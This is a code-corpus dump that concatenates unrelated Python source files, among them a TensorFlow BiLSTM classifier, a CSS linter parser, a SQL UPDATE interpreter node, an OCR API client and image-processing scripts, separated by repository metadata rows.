cell_fw = LSTM_drop_fw,
cell_bw = LSTM_drop_bw,
inputs = input_data,
initial_state_fw=LSTM_cell_fw.zero_state(BATCH_SIZE, dtype=tf.float32),
initial_state_bw=LSTM_cell_bw.zero_state(BATCH_SIZE, dtype=tf.float32),
parallel_iterations = 64
)
lastoutput = tf.concat(values = [RNNout_fw[:, -1, :], RNNout_bw[:, -1, :]], axis = 1)
with tf.name_scope("FC"):
# pred = tf.layers.batch_normalization(lastoutput, axis=1, training = training)
pred = tf.layers.batch_normalization(lastoutput, training = training)
pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
pred = tf.nn.dropout(pred, dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
pred = tf.nn.dropout(pred, dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
pred = tf.nn.dropout(pred, dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 64, activation = tf.nn.relu)
pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
        # output raw logits here; softmax_cross_entropy_with_logits_v2 below
        # applies the softmax itself, so softmax-ing twice would be a bug
        pred = tf.layers.dense(pred, 2)
with tf.name_scope("CrossEntropy"):
cross_entropy = \
tf.nn.softmax_cross_entropy_with_logits_v2(
logits = pred,
labels = labels
)
loss = tf.reduce_mean(cross_entropy, name = "loss")
with tf.name_scope("Accuracy"):
Accuracy = tf.reduce_mean(
tf.cast(
tf.equal(
tf.argmax(pred, 1),
tf.argmax(labels, 1)
),
dtype = tf.float32
),
name = "accuracy"
)
with tf.name_scope("Optimizer"):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)
optimizer = tf.group([optimizer, update_ops])
return input_data, labels, dropout_keep_prob, optimizer, Accuracy, loss, training
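# Sketch of how the returned handles would be consumed in a training loop
# (hypothetical session code, not part of the original file):
#   _, acc, l = sess.run([optimizer, Accuracy, loss],
#                        {input_data: batch_x, labels: batch_y, training: True})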
# def define_graph():
# """
# Implement your model here. You will need to define placeholders, for the input and labels,
# Note that the input is not strings of words, but the strings after the embedding lookup
# has been applied (i.e. arrays of floats).
# In all cases this code will be called by an unaltered runner.py. You should read this
# file and ensure your code here is compatible.
# Consult the assignment specification for details of which parts of the TF API are
# permitted for use in this function.
# You must return, in the following order, the placeholders/tensors for;
# RETURNS: input, labels, optimizer, accuracy and loss
# """
# """
# training_data_embedded[exampleNum., ]
# input data is placeholder, size NUM_SAMPLES x MAX_WORDS_IN_REVIEW x EMBEDDING_SIZE
# labels placeholder,
# dropout_keep_prob placeholder,
# optimizer is function with placeholder input_data, labels, dropout_keep_prob
# Accuracy, loss is function with placeholder input_data, labels
# """
# lstm_hidden_unit = 256
# learning_rate = 0.001
# dropout_keep_prob = tf.placeholder_with_default(0.6, shape=(), name='drop_rate')
# input_data = tf.placeholder(
# tf.float32,
# shape=(BATCH_SIZE, MAX_WORDS_IN_REVIEW, EMBEDDING_SIZE),
# name="input_data"
# )
# input_data_norm = tf.layers.batch_normalization(input_data, axis=1)
# input_data_norm = input_data
# labels = tf.placeholder(tf.float32, shape=(BATCH_SIZE, 2), name="labels")
# LSTM_cell_fw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
# LSTM_cell_bw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
# LSTM_drop_fw = tf.nn.rnn_cell.DropoutWrapper(
# cell = LSTM_cell_fw,
# output_keep_prob = dropout_keep_prob
# )
# LSTM_drop_bw = tf.nn.rnn_cell.DropoutWrapper(
# cell = LSTM_cell_bw,
# output_keep_prob = dropout_keep_prob
# )
# (RNNout_fw, RNNout_bw), _ = tf.nn.bidirectional_dynamic_rnn(
# cell_fw = LSTM_drop_fw,
# cell_bw = LSTM_drop_bw,
# inputs = input_data_norm,
# initial_state_fw=LSTM_cell_fw.zero_state(BATCH_SIZE, dtype=tf.float32),
# initial_state_bw=LSTM_cell_bw.zero_state(BATCH_SIZE, dtype=tf.float32),
# parallel_iterations = 16
# )
# last_output = []
# for i in range(1):
# last_output.append(RNNout_fw[:, -i, :])
# last_output.append(RNNout_bw[:, -i, :])
# lastoutput = tf.concat(last_output, 1)
# with tf.name_scope("fc_layer"):
# lastoutput_norm = tf.layers.batch_normalization(lastoutput, axis=1)
# # lastoutput_norm = lastoutput
# pred = tf.layers.dense(lastoutput_norm, 128, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 64, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 2, activation = tf.nn.softmax)
# cross_entropy = \
# tf.nn.softmax_cross_entropy_with_logits_v2(
# logits = pred,
# labels = labels
# )
# Accuracy = tf.reduce_mean(
# tf.cast(
# tf.equal(
# tf.argmax(pred, 1),
# tf.argmax(labels, 1)
# ),
# dtype = tf.float32
# ),
# name = "accuracy"
# )
# loss = tf.reduce_mean(cross_entropy, name = "loss")
# optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)
# # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9).minimize(loss)
#     return input_data, labels, dropout_keep_prob, optimizer, Accuracy, loss
 | 40.467797 | 107 | 0.59608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,259 | 0.608058 |
7b3cc4dc345dd62020834a44def43b7e9619fb29 | 3,492 | py | Python | cssqc/parser.py | matematik7/CSSQC | f8048435e60f688fef70d1608651d31e1288b4cf | [
"MIT"
]
| null | null | null | cssqc/parser.py | matematik7/CSSQC | f8048435e60f688fef70d1608651d31e1288b4cf | [
"MIT"
]
| null | null | null | cssqc/parser.py | matematik7/CSSQC | f8048435e60f688fef70d1608651d31e1288b4cf | [
"MIT"
]
 | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------
# cssqc/__init__.py
#
# css quality control
# ----------------------------------------------------------------
# copyright (c) 2014 - Domen Ipavec
# Distributed under The MIT License, see LICENSE
# ----------------------------------------------------------------
import importlib
import csslex, cssyacc
from cssyacc.ruleset import Ruleset
from cssqc.statistics import Statistics
EVENTS = (
'IDENT',
'ATKEYWORD',
'ATBRACES',
'STRING',
'HASH',
'NUMBER',
'PERCENTAGE',
'DIMENSION',
'URI',
'UNICODE_RANGE',
'CDO',
'CDC',
'COLON',
'SEMICOLON',
'BRACES_R',
'BRACES_L',
'PARENTHESES_R',
'PARENTHESES_L',
'BRACKETS_R',
'BRACKETS_L',
'COMMENT',
'WS',
'FUNCTION',
'INCLUDES',
'DASHMATCH',
'DELIM',
'Block',
'Brackets',
'Comment',
'Function',
'Parentheses',
'Ruleset',
'Selector',
'Statement',
'Whitespace'
)
instance = None
class CSSQC:
def __init__(self, rules):
global instance
self.events = {}
for e in EVENTS:
self.events[e] = []
self.afterParse = []
self.addRules(rules)
self.parser = cssyacc.getYacc()
self.warnings = []
self.tokens = []
self.objects = []
self.current_token = 0
self.statistics = Statistics()
self.addRuleObject(self.statistics)
instance = self
@staticmethod
def getInstance():
global instance
return instance
def addRules(self, rules):
for rule in rules:
try:
enabled = rules.getboolean(rule)
except:
enabled = True
if enabled:
module = importlib.import_module("cssqc.rules."+rule)
klass = getattr(module, rule)
self.addRuleObject(klass(rules[rule]))
def eventName(self, e):
return "on_"+e
def addRuleObject(self, o):
for e in EVENTS:
f = getattr(o, self.eventName(e), None)
if callable(f):
self.events[e].append(f)
f = getattr(o, "afterParse", None)
if callable(f):
self.afterParse.append(f)
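    # e.g. a rule object that defines `def on_COMMENT(self, token): ...` is
    # wired to every COMMENT token seen during lexing, and its `afterParse`
    # method (if any) is called once with the full parse result.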
def event(self, e, obj):
for f in self.events[e]:
self.warnings += f(obj)
def register(self, name, obj):
self.objects.append((name, obj))
def token(self):
if len(self.tokens) > self.current_token:
t = self.tokens[self.current_token]
self.current_token += 1
return t
else:
return None
def parse(self, data):
# lex
l = csslex.getLexer()
l.input(data)
# parse tokens
for token in l:
self.tokens.append(token)
self.event(token.type, token)
# yacc
result = self.parser.parse(lexer=self)
for el in result:
if type(el) is Ruleset:
el.setDepth(0)
# parse objects
for obj in self.objects:
self.event(obj[0], obj[1])
# after parse
for f in self.afterParse:
self.warnings += f(result)
# sort warnings
self.warnings.sort(key=lambda qw: qw.line)
return result
| 23.28 | 69 | 0.489977 | 2,416 | 0.691867 | 0 | 0 | 84 | 0.024055 | 0 | 0 | 804 | 0.230241 |
7b3e25ca3f02a2235c0f0ca58913370560e98207 | 3,351 | py | Python | parser/team23/instruccion/update_st.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| 35 | 2020-12-07T03:11:43.000Z | 2021-04-15T17:38:16.000Z | parser/team23/instruccion/update_st.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| 47 | 2020-12-09T01:29:09.000Z | 2021-01-13T05:37:50.000Z | parser/team23/instruccion/update_st.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
 | 556 | 2020-12-07T03:13:31.000Z | 2021-06-17T17:41:10.000Z |
from abstract.instruccion import *
from tools.console_text import *
from tools.tabla_tipos import *
from storage import jsonMode as funciones
from error.errores import *
from tools.tabla_simbolos import *
class update_st (instruccion):
def __init__(self, id1, id2, dato, where, line, column, num_nodo):
super().__init__(line, column)
self.id1 = id1
self.id2 = id2
self.dato = dato
self.where = where
        # UPDATE AST node
self.nodo = nodo_AST('UPDATE', num_nodo)
self.nodo.hijos.append(nodo_AST('UPDATE', num_nodo + 1))
self.nodo.hijos.append(nodo_AST(id1, num_nodo + 2))
self.nodo.hijos.append(nodo_AST('SET', num_nodo + 3))
self.nodo.hijos.append(nodo_AST(id2, num_nodo + 4))
self.nodo.hijos.append(nodo_AST('=', num_nodo + 5))
self.nodo.hijos.append(nodo_AST(dato, num_nodo + 6))
if where != None:
self.nodo.hijos.append(where.nodo)
        # Grammar
self.grammar_ = "<TR><TD>INSTRUCCION ::= UPDATE ID SET ID = op_val where; </TD><TD>INSTRUCCION = falta poner accicon;</TD></TR>"
if where != None:
self.grammar_ += where.grammar_
def ejecutar(self):
id_db = get_actual_use()
if self.where != None:
list_id = [self.id1]
val_return = self.where.ejecutar(list_id)
dato_val = self.dato.ejecutar(list_id)
index_col = ts.get_pos_col(id_db, self.id1, self.id2)
index_pk = ts.get_index_pk(id_db, self.id1)
for item in val_return.valor:
dict_registro = {}
count_col = 0
for col in item:
if count_col == index_col:
dict_registro[count_col] = dato_val.valor
else:
dict_registro[count_col] = col
count_col += 1
list_pk = []
for id_pk in index_pk:
list_pk.append(item[id_pk])
resultado = funciones.update(id_db, self.id1, dict_registro, list_pk)
                # Return value: 0 success, 1 operation error, 2 database does not exist, 3 table does not exist, 4 primary key does not exist.
                if resultado == 1:
                    errores.append(nodo_error(self.line, self.column, 'ERROR - the update could not be performed', 'Semantic'))
                    add_text('ERROR - the update could not be performed\n')
                elif resultado == 2:
                    errores.append(nodo_error(self.line, self.column, 'ERROR - the database was not found', 'Semantic'))
                    add_text('ERROR - the database was not found\n')
                elif resultado == 3:
                    errores.append(nodo_error(self.line, self.column, 'ERROR - table ' + self.id1 + ' was not found', 'Semantic'))
                    add_text('ERROR - table ' + self.id1 + ' was not found\n')
                elif resultado == 4:
                    errores.append(nodo_error(self.line, self.column, 'ERROR - the primary key does not exist', 'Semantic'))
                    add_text('ERROR - the primary key does not exist\n')
                add_text('Records updated\n')
else:
            pass
 | 41.37037 | 156 | 0.5661 | 3,153 | 0.938672 | 0 | 0 | 0 | 0 | 0 | 0 | 700 | 0.208395 |
7b3e6682a8f4db3e33235458e638c05f2e380911 | 1,791 | py | Python | ncfm/generate_proposals.py | kirk86/kaggle | 8178ed790bc1f8fcd2cd7a01560e5f25f01c07cc | [
"MIT"
]
| null | null | null | ncfm/generate_proposals.py | kirk86/kaggle | 8178ed790bc1f8fcd2cd7a01560e5f25f01c07cc | [
"MIT"
]
| null | null | null | ncfm/generate_proposals.py | kirk86/kaggle | 8178ed790bc1f8fcd2cd7a01560e5f25f01c07cc | [
"MIT"
]
 | null | null | null |
# import sys
# sys.path.append('/usr/local/lib/python2.7/site-packages')
import dlib
import scipy.io
from skimage import io
import numpy as np
def dlib_selective_search(orig_img, img_scale, min_size, dedub_boxes=1./16):
rects = []
dlib.find_candidate_object_locations(orig_img, rects, min_size=min_size)
# proposals = []
# for key, val in enumerate(rects):
# # templist = [val.left(), val.top(), val.right(), val.bottom()]
# templist = [val.top(). val.left(), val.bottom(), val.right()]
# proposals.append(templist)
# proposals = np.array(proposals)
    # 0 maybe used for bg, not quite sure
rects = [[0., d.left() * img_scale * dedub_boxes,
d.top() * img_scale * dedub_boxes,
d.right() * img_scale * dedub_boxes,
d.bottom() * img_scale * dedub_boxes] for d in rects]
# bbox pre-processing
# rects *= img_scale
v = np.array([1, 1e3, 1e6, 1e9, 1e12])
# hashes = np.round(rects * dedub_boxes).dot(v)
hashes = np.round(rects).dot(v)
_, index, inv_index = np.unique(hashes, return_index=True,
return_inverse=True)
rects = np.array(rects)[index, :]
return rects
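# Dedup note: each [0, l, t, r, b] box is dotted with powers of 1e3 above, so
# boxes whose rounded coordinates coincide hash to the same value and collapse
# to a single entry.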
# NOTE: placeholder paths; the directory name was garbled in the original
# ('val.ta'), so 'data' is an assumption.
imagenet_path = 'path/to/imagenet/data/Images'
names = 'path/to/imagenet/data/ImageSets/train.txt'
count = 0
all_proposals = []
imagenms = []
nameFile = open(names)
for line in nameFile.readlines():
    name = line.split('\n')[0]
    filename = imagenet_path + name + '.png'
    img = io.imread(filename)
    # img_scale=1.0 and min_size=500 are illustrative values; the original
    # call passed only the filename, which does not match the signature of
    # dlib_selective_search above.
    single_proposal = dlib_selective_search(img, 1.0, 500)
    all_proposals.append(single_proposal)
    # record the image name so the saved 'images' field is populated
    imagenms.append(name)
    count += 1
    print(count)
scipy.io.savemat('train.mat', mdict={'all_boxes': all_proposals,
                                     'images': imagenms})
obj_proposals = scipy.io.loadmat('train.mat')
print(obj_proposals)
| 33.166667 | 76 | 0.634841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 577 | 0.322166 |
7b405010c115340a11d63243786f96de4c6d44a6 | 3,953 | py | Python | comp_prov.py | RickyMexx/ML_CompilerProvenance | ce19276aa93b01fa6cdd275e5c0514cb0e9a9f45 | [
"Apache-2.0"
]
| null | null | null | comp_prov.py | RickyMexx/ML_CompilerProvenance | ce19276aa93b01fa6cdd275e5c0514cb0e9a9f45 | [
"Apache-2.0"
]
| null | null | null | comp_prov.py | RickyMexx/ML_CompilerProvenance | ce19276aa93b01fa6cdd275e5c0514cb0e9a9f45 | [
"Apache-2.0"
]
 | null | null | null |
# each JSON has: {instructions}, {opt}, {compiler}
# MODEL SETTINGS: please set these before running the main #
mode = "opt" # Labels of the model: [opt] or [compiler]
samples = 3000 # Number of the blind set samples
fav_instrs_in = ["mov"] # Set of instructions of which DEST register should be extracted [IN]
fav_instrs_eq = ["lea"] # Set of instructions of which DEST register should be extracted [EQ]
# -------------- #
# import warnings filter
from warnings import simplefilter
# ignore all future warnings
simplefilter(action='ignore', category=FutureWarning)
import json
import csv
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import *
from sklearn.metrics import confusion_matrix, classification_report, log_loss
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
import scikitplot as skplt
import matplotlib.pyplot as plt
# Function that parses the input file
# Dataset can be 1 (train) or 2 (blind test)
def processFile(name, i, o, c, dataset):
with open(name) as f:
for jsonl in f:
tmp = json.loads(jsonl)
i.append(tmp['instructions'])
if (dataset == 1):
o.append(tmp['opt'])
c.append(tmp['compiler'])
for idx in range(len(i)):
start = ""
for word in i[idx]:
tmp = ""
arr = word.split()
flag = True
for ins1 in fav_instrs_in:
if ins1 in arr[0]:
flag = False
tmp = arr[0] + " " + arr[1] + " "
for ins2 in fav_instrs_eq:
if ins2 == arr[0]:
flag = False
tmp = arr[0] + " " + arr[1] + " "
if flag:
tmp = arr[0] + " "
start += tmp
i[idx] = start
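    # Illustrative effect (hypothetical input): ["mov eax, ebx", "add eax, 1",
    # "lea ecx, [eax]"] becomes "mov eax, add lea ecx, " -- the destination
    # operand is kept only for the fav_instrs_in / fav_instrs_eq mnemonics.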
# Function that deals with the csv file
# Index can be: 1 (opt) or 2 (compiler)
def produceOutput(name, out, index):
if index != 0 and index != 1:
return
lines = list()
with open(name, "r") as fr:
rd = csv.reader(fr)
lines = list(rd)
if not lines:
lines = [None] * samples
for i in range(samples):
lines[i] = ["--", "--"]
for i in range(samples):
lines[i][index] = out[i]
with open(name, "w") as fw:
wr = csv.writer(fw)
wr.writerows(lines)
if __name__ == "__main__":
index = 1 if mode == "opt" else 0
instrs = list()
opt = list()
comp = list()
processFile("train_dataset.jsonl", instrs, opt, comp, 1)
vectorizer = CountVectorizer(min_df=5)
#vectorizer = TfidfVectorizer(min_df=5)
X_all = vectorizer.fit_transform(instrs)
y_all = opt if mode == "opt" else comp
X_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.2, random_state=15)
#model = RandomForestClassifier(n_estimators=200).fit(X_train, y_train)
model = GradientBoostingClassifier(n_estimators=200, max_depth=7).fit(X_train, y_train)
print("Outcomes on test set")
pred = model.predict(X_test)
print(confusion_matrix(y_test, pred))
print(classification_report(y_test, pred))
ll = log_loss(y_test, model.predict_proba(X_test))
print("Log Loss: {}".format(ll))
#skplt.metrics.plot_precision_recall_curve(y_test, model.predict_proba(X_test), title="MOGB")
#skplt.metrics.plot_confusion_matrix(y_test, pred, normalize=True, title="MOGB")
#plt.show()
# Calculating the overfitting
print("Outcomes on training set")
pred2 = model.predict(X_train)
print(confusion_matrix(y_train, pred2))
print(classification_report(y_train, pred2))
# Predicting the blind dataset
b_instrs = list()
processFile("test_dataset_blind.jsonl", b_instrs, list(), list(), 2)
b_X_all = vectorizer.transform(b_instrs)
b_pred = model.predict(b_X_all)
produceOutput("1743168.csv", b_pred, index)
| 30.407692 | 101 | 0.625348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,132 | 0.286365 |
7b42bb511e27ed76adb521890d7b12af28eb727f | 206 | py | Python | project/striide/urls.py | Striide/DjangoRestApi | db4bec3bf5ac7b60021a5e28d67a054d80ed307f | [
"MIT"
]
| null | null | null | project/striide/urls.py | Striide/DjangoRestApi | db4bec3bf5ac7b60021a5e28d67a054d80ed307f | [
"MIT"
]
| null | null | null | project/striide/urls.py | Striide/DjangoRestApi | db4bec3bf5ac7b60021a5e28d67a054d80ed307f | [
"MIT"
]
 | null | null | null |
from django.contrib import admin
from django.conf.urls import url, include
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
]
 | 25.75 | 60 | 0.762136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.514563 |
7b42bde77e1661a4f0f1591879e395dd1510705b | 2,266 | py | Python | task.py | init-helpful/jsontasks | 2cfc0b9b7e5f0ece9d753037f2d6dacf2c165f6e | [
"MIT"
]
| null | null | null | task.py | init-helpful/jsontasks | 2cfc0b9b7e5f0ece9d753037f2d6dacf2c165f6e | [
"MIT"
]
| null | null | null | task.py | init-helpful/jsontasks | 2cfc0b9b7e5f0ece9d753037f2d6dacf2c165f6e | [
"MIT"
]
 | null | null | null |
from jsonlink import JsonLink
from globals import read_json_file
class Task(JsonLink):
def __init__(
self,
name="",
task_description=None,
step_groupings=[],
global_values={},
global_hooks={},
steps=[],
python_dependencies=[],
keywords_file_path="",
):
self.task_name = name
self.task_description = task_description
self.step_groupings = step_groupings
self.global_values = global_values
self.global_hooks = global_hooks
self.steps = steps
self.python_dependencies = python_dependencies
super(Task, self).__init__(
keywords_file_path=keywords_file_path,
attribute_filters=["__", "parse"],
sub_classes=[Step],
)
def __repr__(self):
return f"""
Name : {self.task_name.upper()}
Description : {self.task_description}
Global Values : {self.global_values}
Groupings : {self.step_groupings}
Hooks : {self.global_hooks}
Steps : {self.steps}
"""
# def step_name(self, *args):
# self.__update_value_in_step("name", args)
# def __update_value_in_step(self, property_to_update, args):
# self.current_task.update_step(
# index=get_indexes(path(args), return_last_found=True),
# variables={property_to_update: value(args)},
# )
# def parse(self, task, task_name=""):
# self.current_task = Task()
# return self.current_task
class Step:
def __init__(
self,
step_name="",
step_description="",
data_hooks={},
associated_data={},
dependent_on={},
):
self.name = step_name
self.description = step_description
self.hooks = data_hooks
self.data = associated_data
self.dependent_on = dependent_on
def __repr__(self):
return f"""
Name : {self.name}
Description : {self.description}
Hooks : {self.hooks}
Data : {self.data}
Dependent On : {self.dependent_on}
"""
task = Task()
task.update_from_dict(read_json_file("exampletask.json"))
print(task)
| 26.97619 | 68 | 0.581642 | 2,107 | 0.929832 | 0 | 0 | 0 | 0 | 0 | 0 | 916 | 0.404237 |
7b4355b686014d85c2cc35d093973bc84723e068 | 5,252 | py | Python | sight_api/__init__.py | siftrics/sight-python | dd162b54efa856cd15955791bbdb563b3ca9cd35 | [
"Apache-2.0"
]
| 1 | 2020-02-23T19:08:39.000Z | 2020-02-23T19:08:39.000Z | sight_api/__init__.py | siftrics/sight-python | dd162b54efa856cd15955791bbdb563b3ca9cd35 | [
"Apache-2.0"
]
| null | null | null | sight_api/__init__.py | siftrics/sight-python | dd162b54efa856cd15955791bbdb563b3ca9cd35 | [
"Apache-2.0"
]
 | null | null | null |
# Copyright © 2020 Siftrics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
__version__ = '1.2.0'
import base64
import requests
import time
def _getOrElse(json, key):
if key not in json:
raise Exception('This should never happen. Got successful HTTP status code (200) but the body was not the JSON we were expecting.')
return json[key]
class Client:
def __init__(self, api_key):
self.api_key = api_key
def doPoll(self, pollingURL, files):
fileIndex2HaveSeenPages = [list() for _ in files]
while True:
response = requests.get(
pollingURL,
headers={ 'Authorization': 'Basic {}'.format(self.api_key) },
)
response.raise_for_status()
json = response.json()
pages = _getOrElse(json, 'Pages')
if not pages:
time.sleep(0.5)
continue
for page in pages:
fileIndex = _getOrElse(page, 'FileIndex')
pageNumber = _getOrElse(page, 'PageNumber')
numberOfPagesInFile = _getOrElse(page, 'NumberOfPagesInFile')
if not fileIndex2HaveSeenPages[fileIndex]:
fileIndex2HaveSeenPages[fileIndex] = [False]*numberOfPagesInFile
fileIndex2HaveSeenPages[fileIndex][pageNumber-1] = True
yield json['Pages']
haveSeenAllPages = True
for l in fileIndex2HaveSeenPages:
if not l:
haveSeenAllPages = False
break
if not all(l):
haveSeenAllPages = False
break
if haveSeenAllPages:
return
time.sleep(0.5)
def recognizeAsGenerator(self, files, words=False, autoRotate=False, exifRotate=False):
payload = {
'files': [],
'makeSentences': not words, # make love not bombs
'doAutoRotate': autoRotate,
'doExifRotate': exifRotate
}
for f in files:
fn = f.lower()
if fn.endswith('.pdf'):
mimeType = 'application/pdf'
elif fn.endswith('.bmp'):
mimeType = 'image/bmp'
elif fn.endswith('.gif'):
mimeType = 'image/gif'
elif fn.endswith('.jpeg'):
mimeType = 'image/jpeg'
elif fn.endswith('.jpg'):
mimeType = 'image/jpg'
elif fn.endswith('.png'):
mimeType = 'image/png'
else:
msg = '{} does not have a valid extension; it must be one of ".pdf", ".bmp", ".gif", ".jpeg", ".jpg", or ".png".'.format(f)
raise Exception(msg)
with open(f, 'rb') as fileObj:
base64File = base64.b64encode(fileObj.read())
payload['files'].append({
'mimeType': mimeType,
'base64File': base64File.decode('utf-8'),
})
response = requests.post(
'https://siftrics.com/api/sight/',
headers={ 'Authorization': 'Basic {}'.format(self.api_key) },
json=payload,
)
response.raise_for_status()
json = response.json()
if 'PollingURL' in json:
for pages in self.doPoll(json['PollingURL'], files):
yield pages
return
if 'RecognizedText' not in json:
raise Exception('This should never happen. Got successful HTTP status code (200) but the body was not the JSON we were expecting.')
page = {
'Error': '',
'FileIndex': 0,
'PageNumber': 1,
'NumberOfPagesInFile': 1
}
page.update(json)
yield [page]
return
def recognize(self, files, words=False, autoRotate=False, exifRotate=False):
if type(files) is not list:
msg = 'You must pass in a list of files, not a {}'.format(type(files))
raise TypeError(msg)
pages = list()
for ps in self.recognizeAsGenerator(
files, words=words, autoRotate=autoRotate, exifRotate=exifRotate):
pages.extend(ps)
return pages
| 40.091603 | 143 | 0.581493 | 3,886 | 0.739768 | 3,362 | 0.640015 | 0 | 0 | 0 | 0 | 1,908 | 0.363221 |
7b443c8f7fa19307b9a833a456473a9a811c2e29 | 190 | py | Python | back-end/erasmail/emails/admin.py | SamirM-BE/ErasMail | 88602a039ae731ca8566c96c7c4d2635f82a07a5 | [
"Apache-2.0"
]
| 7 | 2021-02-06T21:06:23.000Z | 2022-01-31T09:33:26.000Z | back-end/erasmail/emails/admin.py | SamirM-BE/ErasMail | 88602a039ae731ca8566c96c7c4d2635f82a07a5 | [
"Apache-2.0"
]
| null | null | null | back-end/erasmail/emails/admin.py | SamirM-BE/ErasMail | 88602a039ae731ca8566c96c7c4d2635f82a07a5 | [
"Apache-2.0"
]
| 5 | 2021-05-07T15:35:25.000Z | 2022-03-21T09:11:24.000Z | from django.contrib import admin
from .models import Attachment, EmailHeaders, Newsletter
admin.site.register(EmailHeaders)
admin.site.register(Attachment)
admin.site.register(Newsletter)
| 23.75 | 56 | 0.836842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b47c5080977b6ed437b3d285f1ec4ab43d82e70 | 145 | py | Python | acronym.py | MathewsPeter/PythonProjects | 4ea83a317452f8abd2c9c1273753037de263f88f | [
"MIT"
]
| null | null | null | acronym.py | MathewsPeter/PythonProjects | 4ea83a317452f8abd2c9c1273753037de263f88f | [
"MIT"
]
| null | null | null | acronym.py | MathewsPeter/PythonProjects | 4ea83a317452f8abd2c9c1273753037de263f88f | [
"MIT"
]
 | null | null | null |
fullform = input("Enter a full form: ")
words = fullform.split(" ")
acro = ""
for word in words:
    acro += word[0]
print("Acronym is ", acro)
 | 24.166667 | 39 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.268966 |
7b480f2ef9a1cf0b8da2461f923c649d122517ca | 514 | py | Python | Usuario.py | Josh0105/SESION9 | 90421c3573e66c5d4bdf93c52c67658b9de03977 | [
"Apache-2.0"
]
| 1 | 2020-10-20T04:02:49.000Z | 2020-10-20T04:02:49.000Z | Usuario.py | Josh0105/Sesion9 | 90421c3573e66c5d4bdf93c52c67658b9de03977 | [
"Apache-2.0"
]
| null | null | null | Usuario.py | Josh0105/Sesion9 | 90421c3573e66c5d4bdf93c52c67658b9de03977 | [
"Apache-2.0"
]
| null | null | null |
class Usuario:
def __init__(self, id, usuario, passw):
self.id = id
self.usuario = usuario
self.passw = passw
def autenticar(self, usuario, passw):
if self.usuario == usuario and self.passw == passw:
print("La autenticación fue correcta")
return True
print ("La autenticación fue incorrecta")
return False
def dump(self):
return {
'id' : self.id,
'nombre' : self.usuario
        }
 | 19.769231 | 59 | 0.533074 | 515 | 0.998062 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.151163 |
7b483bc7a8258807d0838c4087de8c2c75b55797 | 802 | py | Python | 10_54_sobel_filter.py | Larilok/image_processing | 331e50ecd127ba61d6a59a51b7e90f0fd31c7a29 | [
"MIT"
]
| null | null | null | 10_54_sobel_filter.py | Larilok/image_processing | 331e50ecd127ba61d6a59a51b7e90f0fd31c7a29 | [
"MIT"
]
| null | null | null | 10_54_sobel_filter.py | Larilok/image_processing | 331e50ecd127ba61d6a59a51b7e90f0fd31c7a29 | [
"MIT"
]
 | null | null | null |
from skimage import img_as_int
import cv2
import numpy as np
from pylab import *
import scipy.ndimage.filters as filters
#img = cv2.imread('images/profile.jpg', 0)
img = cv2.imread('images/moon.jpg',0)
sobel_operator_v = np.array([
